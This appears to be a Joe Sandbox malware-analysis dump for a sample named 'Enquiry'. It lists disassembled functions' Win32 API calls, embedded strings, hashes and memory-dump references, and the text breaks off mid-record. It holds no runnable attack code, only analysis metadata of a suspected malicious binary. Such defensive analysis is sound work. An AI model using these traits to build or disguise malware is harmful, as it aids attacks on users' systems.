                            • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                            APIs
                            • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                            • GetMenuItemCount.USER32(?), ref: 00468C45
                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                            • GetMenuItemCount.USER32 ref: 00468CFD
                            • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                            • GetCursorPos.USER32(?), ref: 00468D3F
                            • SetForegroundWindow.USER32(?), ref: 00468D49
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                            • String ID: 0
                            • API String ID: 1441871840-4108050209
                            • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                            • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                            • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                            • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                            • __swprintf.LIBCMT ref: 00460915
                            • __swprintf.LIBCMT ref: 0046092D
                            • _wprintf.LIBCMT ref: 004609E1
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                            • API String ID: 3631882475-2268648507
                            • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                            • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                            • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                            • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                            APIs
                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                            • SendMessageW.USER32 ref: 00471740
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                            • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                            • SendMessageW.USER32 ref: 0047184F
                            • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                            • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                            • String ID:
                            • API String ID: 4116747274-0
                            • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                            • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                            • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                            • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                            APIs
                            • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                            • _wcslen.LIBCMT ref: 00461683
                            • __swprintf.LIBCMT ref: 00461721
                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                            • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                            • GetDlgCtrlID.USER32(?), ref: 00461869
                            • GetWindowRect.USER32(?,?), ref: 004618A4
                            • GetParent.USER32(?), ref: 004618C3
                            • ScreenToClient.USER32(00000000), ref: 004618CA
                            • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                            • String ID: %s%u
                            • API String ID: 1899580136-679674701
                            • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                            • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                            • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                            • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                            APIs
                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: InfoItemMenu$Sleep
                            • String ID: 0
                            • API String ID: 1196289194-4108050209
                            • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                            • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                            • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                            • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                            APIs
                            • GetDC.USER32(00000000), ref: 0043143E
                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                            • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                            • SelectObject.GDI32(00000000,?), ref: 00431466
                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                            • String ID: (
                            • API String ID: 3300687185-3887548279
                            • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                            • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                            • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                            • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                            APIs
                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                            • GetDriveTypeW.KERNEL32 ref: 0045DB32
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                            • API String ID: 1976180769-4113822522
                            • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                            • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                            • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                            • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                            • String ID:
                            • API String ID: 461458858-0
                            • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                            • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                            • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                            • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                            APIs
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                            • GlobalLock.KERNEL32(00000000), ref: 004300F6
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                            • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                            • CloseHandle.KERNEL32(00000000), ref: 00430113
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                            • GlobalFree.KERNEL32(00000000), ref: 00430150
                            • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                            • DeleteObject.GDI32(?), ref: 004301D0
                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                            • String ID:
                            • API String ID: 3969911579-0
                            • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                            • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                            • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                            • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                            • String ID: 0
                            • API String ID: 956284711-4108050209
                            • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                            • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                            • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                            • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                            • String ID: 0.0.0.0
                            • API String ID: 1965227024-3771769585
                            • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                            • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                            • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                            • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: SendString$_memmove_wcslen
                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                            • API String ID: 369157077-1007645807
                            • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                            • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                            • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                            • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                            APIs
                            • GetParent.USER32 ref: 00445BF8
                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                            • __wcsicoll.LIBCMT ref: 00445C33
                            • __wcsicoll.LIBCMT ref: 00445C4F
                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __wcsicoll$ClassMessageNameParentSend
                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                            • API String ID: 3125838495-3381328864
                            • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                            • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                            • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                            • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                            APIs
                            • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                            • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                            • SendMessageW.USER32(?,00000402,?), ref: 00449399
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
